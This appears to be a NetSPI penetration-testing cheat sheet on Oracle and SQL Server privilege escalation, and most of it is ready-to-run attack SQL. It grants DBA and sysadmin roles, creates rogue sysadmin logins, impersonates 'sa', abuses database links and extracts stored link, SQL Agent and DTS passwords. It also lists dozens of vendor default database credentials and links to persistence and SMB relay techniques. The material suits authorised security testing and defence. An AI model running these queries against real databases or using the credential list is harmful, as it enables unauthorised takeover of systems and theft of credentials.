No data yet, please contribute on our Github if you know any useful methods!

Privilege Escalation

Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.

* Requires privileged user

Description Query
Dump All DBA Usernames SELECT username FROM user_role_privs WHERE granted_role='DBA';
Make User DBA * GRANT DBA to USER
Create Procedure CREATE OR REPLACE PROCEDURE “SYSTEM".netspi1 (id IN VARCHAR2)
AS
PRAGMA autonomous_transaction;
EXECUTE IMMEDIATE 'grant dba to scott';
COMMIT;
END;

BEGIN
SYSTEM.netspi1('netspi');
END;
Find Database Links SELECT * FROM DBA_DB_LINKS
SELECT * FROM ALL_DB_LINKS
SELECT * FROM USER_DB_LINKS
Query Database Links SELECT * FROM sales@miami -- minimum for preconfigured
SELECT * FROM harold@netspi.com -- standard usage for selecting table from schema on remote server
SELECT * FROM harold@netspi.com@hq_1 -- standard usage for selecting table from schema on remote server instance
SELECT db_link,password FROM user_db_links WHERE db_link LIKE 'TEST%''
SELECT name,password FROM sys.link$ WHERE name LIKE 'TEST%';
SELECT name,passwordx FROM sys.link$ WHERE name LIKE 'TEST%';
Execute stored procedures on database links EXEC mySchema.myPackage.myProcedure@myRemoteDB( 'someParameter' );
SELECT dbms_xmlquery.getxml('select * from emp') FROM harold@netspi.com
Creating database links CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com; -- connected user setup
CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com CONNECT TO harold AS tiger; -- standard defined user/pass
CREATE SHARED PUBLIC DATABASE LINK hq.netspi.com.com@hq_1 USING 'string_to_hq_1'; -- instance specific
CREATE SHARED PUBLIC DATABASE LINK link_2 CONNECT TO jane IDENTIFIED BY doe USING 'us_supply'; -- defined user/pass
Removing Links DROP DATABASE LINK miami;

Privilege Escalation

Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.

* Requires privileged user. The queries below require various privilege types. Stay tuned for detailed privilege escalation paths.

Description Query
Make User DBA * EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
Grant Execute on All Custom Objects SELECT 'grant exec on ' + QUOTENAME(ROUTINE_SCHEMA) + '.' +
QUOTENAME(ROUTINE_NAME) + ' TO test' FROM INFORMATION_SCHEMA.ROUTINES
WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'IsMSShipped') = 0 ;
Grant Execute on All Store Procedures CREATE ROLE db_executor
GRANT EXECUTE TO db_executor
exec sp_addrolemember 'db_executor', 'YourSecurityAccount'
UNC Path Injection https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
Detect Impersonatable logins SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Impersonate Login
Note: REVERT will bring you back to your original login.
EXECUTE AS LOGIN = 'sa'; SELECT @@VERSION;
Create sysadmin user * USE [master]
GO
CREATE LOGIN [test] WITH PASSSWORD=N 'test', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
EXEC master..sp_addsrvrolemember @loginame=N'test', @rolename=N'sysadmin'
GO
Create sysadmin user * EXEC sp_addlogin 'user', 'pass';
* EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
Drop User * EXEC sp_droplogin 'user';
Retrieve SQL Agent Connection Passwords exec msdb.dbo.sp_get_sqlagent_properties
Retrieve DTS Connection Passwords select msdb.dbo.rtbldmbprops
Get sysadmin as local admin https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/
Startup stored procedures https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
Trigger creation https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/
Windows auto-logon passwords https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/
xp_regwrite non-sysadmin execution https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e
Stored procedures with trustworthy databases https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases
Stored procedure user impersonation https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
Default passwords sa:sa
sa:[empty]
[username]:[username]
Default passwords for instances (Instance name, User, Pass) "ACS","ej","ej"
"ACT7","sa","sage"
"AOM2","admin","ca_admin"
"ARIS","ARIS9","*ARIS!1dm9n#"
"AutodeskVault","sa","AutodeskVault@26200" "BOSCHSQL","sa","RPSsql12345"
"BPASERVER9","sa","AutoMateBPA9"
"CDRDICOM","sa","CDRDicom50!"
"CODEPAL","sa","Cod3p@l"
"CODEPAL08","sa","Cod3p@l"
"CounterPoint","sa","CounterPoint8"
"CSSQL05","ELNAdmin","ELNAdmin"
"CSSQL05","sa","CambridgeSoft_SA"
"CADSQL","CADSQLAdminUser","Cr41g1sth3M4n!"
"DHLEASYSHIP","sa","DHLadmin@1"
"DPM","admin","ca_admin"
"DVTEL","sa",""
"EASYSHIP","sa","DHLadmin@1"
"ECC","sa","Webgility2011"
"ECOPYDB","e+C0py2007_@x","e+C0py2007_@x"
"ECOPYDB","sa","ecopy"
"Emerson2012","sa","42Emerson42Eme"
"HDPS","sa","sa"
"HPDSS","sa","Hpdsdb000001"
"HPDSS","sa","hpdss"
"INSERTGT","msi","keyboa5"
"INSERTGT","sa",""
"INTRAVET","sa","Webster#1"
"MYMOVIES","sa","t9AranuHA7"
"PCAMERICA","sa","pcAmer1ca"
"PCAMERICA","sa","PCAmerica"
"PRISM","sa","SecurityMaster08"
"RMSQLDATA","Super","Orange"
"RTCLOCAL","sa","mypassword"
"SALESLOGIX","sa","SLXMaster"
"SIDEXIS_SQL","sa","2BeChanged"
"SQL2K5","ovsd","ovsd"
"SQLEXPRESS","admin","ca_admin"
"STANDARDDEV2014","test","test" "TEW_SQLEXPRESS","tew","tew"
"vocollect","vocollect","vocollect"
"VSDOTNET","sa",""
"VSQL","sa","111"

© 2018 Copyright by NetSPI. All rights reserved.